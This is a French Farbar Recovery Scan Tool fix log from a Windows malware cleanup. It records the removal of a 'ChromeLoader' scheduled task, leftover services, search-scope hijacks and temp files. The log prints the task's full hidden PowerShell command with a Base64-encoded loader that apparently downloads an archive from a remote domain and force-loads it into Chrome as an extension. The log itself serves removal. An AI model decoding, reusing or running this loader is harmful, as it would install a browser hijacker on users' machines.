Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 27-12-2021
Exécuté par NzL_O (09-01-2022 23:13:54) Run:1
Exécuté depuis C:\Users\NzL_O\Desktop
Profils chargés: NzL_O
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\1.5.471.0\McCSPServiceHost.exe" [X]
S2 nvsvc; "C:\Windows\system32\nvvsvc.exe" [X]
Task: {17ED66E9-4C6A-4B25-ADA8-D8316B351B54} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBsAGUAYQByAG4AYQB0AGEAbABvAHUAawB0AC4AeAB5AHoAIgAKAAoAJABpAHMATwBwAGUAbgAgAD0AIAAwAAoAJABkAGQAIAA9ACAAMAAKACQAdgBlAHIAIAA9ACAAMAAKAAoAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAdABlAHIAIAAiAG4AYQBtAGUAPQAnAGMAaAByAG8AbQBlAC4AZQB4AGUAJwAiACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoACQBpAGYAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuACIAKQB7AAoACQAJAGIAcgBlAGEAawAKAAkAfQAKAAoACQAkAGkAcwBPAHAAZQBuACAAPQAgADEACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACkAKQB7AAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACgAJAH0ACgAJAGUAbABzAGUAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGMAbwBuAGYAUABhAHQAaAAiACkACgAJAAkACQB7AAoACQAJAAkACQAkAGMAbwBuAGYAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABjAG8AbgBmAFAAYQB0AGgACgAJAAkACQAJACQAYwBvAG4AZgAuAFMAcABsAGkAdAAoACIAOwAiACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkACQAJAAkACQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBkAGQAIgApAAoACQAJAAkACQAJAHsACgAJAAkACQAJAAkACQAkAGQAZAAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0AZQBsAHMAZQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBFAHgAdABlAG4AcwBpAG8AbgBWAGUAcgBzAGkAbwBuACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJAB2AGUAcgAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0ACgAJAAkACQAJAH0ACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABkAGQAIAAtAGEAbgBkACAAJAB2AGUAcgApAHsACgAKAAoACQAJAAkAdAByAHkAewAKAAoACQAJAAkACQAkAHUAbgAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAHUAbgA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAKAAoACQAJAAkACQBpAGYAKAAkAHUAbgAgAC0ATQBhAHQAYwBoACAAIgAkAGQAZAAiACkAewAKAAkACQAJAAkACQBVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAkAHQAYQBzAGsATgBhAG0AZQAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUACgAJAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAEyBwAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlACAALQBSAGUAYwB1AHIAcwBlAAoACQAJAAkACQB9AAoACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwAD8AZABpAGQAPQAkAGQAZAAmAHYAZQByAD0AJAB2AGUAcgAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAAkAfQAKAAkACQAJAGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAKQB7AAoACQAJAAkACQBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAEwAaQB0AGUAcgBhAGwAUABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACAALQBGAG8AcgBjAGUACgAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkAfQAKAAoACQAJAH0ACgAKAAkAfQAKAAoACQB0AHIAeQB7AAoACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGMAaAByAG8AbQBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBDAGwAbwBzAGUATQBhAGkAbgBXAGkAbgBkAG8AdwAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAH0ACgAJAAkAcwB0AGEAcgB0ACAAYwBoAHIAbwBtAGUAIAAtAC0AbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuAD0AIgAkAGUAeAB0AFAAYQB0AGgAIgAsACAALQAtAHIAZQBzAHQAbwByAGUALQBsAGEAcwB0AC0AcwBlAHMAcwBpAG8AbgAsACAALQAtAG4AbwBlAHIAcgBkAGkAYQBsAG8AZwBzACwAIAAtAC0AZABpAHMAYQBiAGwAZQAtAHMAZQBzAHMAaQBvAG4ALQBjAHIAYQBzAGgAZQBkAC0AYgB1AGIAYgBsAGUACgAJAH0AYwBhAHQAYwBoAHsAfQAKAAoAfQA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier)
SearchScopes: HKLM -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
SearchScopes: HKLM-x32 -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> DefaultScope {31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} URL = 
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} URL = 
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {719CE0F4-9739-45B7-A8F0-F10F849CBAB9} URL = 
SearchScopes: HKU\S-1-5-21-1677540230-3073805055-3309549447-1001 -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
AlternateDataStreams: C:\Users\NzL_O\Application Data:fc7b7d0f14c2a9475ac28a6ca7e82bc5 [394]
AlternateDataStreams: C:\Users\NzL_O\AppData\Roaming:fc7b7d0f14c2a9475ac28a6ca7e82bc5 [394]
Task: {990840B6-1D29-4796-8B6E-5633AB46887E} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe /nogui (Pas de fichier)
2022-01-07 20:58 - 2022-01-07 20:58 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
EmptyTemp:

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\System\CurrentControlSet\Services\mccspsvc => supprimé(es) avec succès
mccspsvc => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\nvsvc => supprimé(es) avec succès
nvsvc => service supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{17ED66E9-4C6A-4B25-ADA8-D8316B351B54}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{17ED66E9-4C6A-4B25-ADA8-D8316B351B54}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ChromeLoader => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromeLoader" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
"HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{31D9C6F3-7BE8-4D82-B82A-C84A1E0CAFE5} => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{719CE0F4-9739-45B7-A8F0-F10F849CBAB9} => supprimé(es) avec succès
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AA9A4890-4262-4441-8977-E2FFCBFB706C} => supprimé(es) avec succès
C:\Users\NzL_O\Application Data => ":fc7b7d0f14c2a9475ac28a6ca7e82bc5" ADS supprimé(es) avec succès
"C:\Users\NzL_O\AppData\Roaming" => ":fc7b7d0f14c2a9475ac28a6ca7e82bc5" ADS non trouvé(e).
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{990840B6-1D29-4796-8B6E-5633AB46887E}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{990840B6-1D29-4796-8B6E-5633AB46887E}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Avast SecureLine => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast SecureLine" => supprimé(es) avec succès
"C:\WINDOWS\system32\Tasks\ChromeLoader" => non trouvé(e)

=========== EmptyTemp: ==========

BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 22195730 B
Java, Flash, Steam htmlcache => 57332288 B
Windows/system/drivers => 519854 B
Edge => 0 B
Chrome => 901775319 B
Firefox => 27878371 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 25770 B
NetworkService => 75444 B
NzL_O => 98267228 B

RecycleBin => 9433776 B
EmptyTemp: => 1 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 23:16:37 ====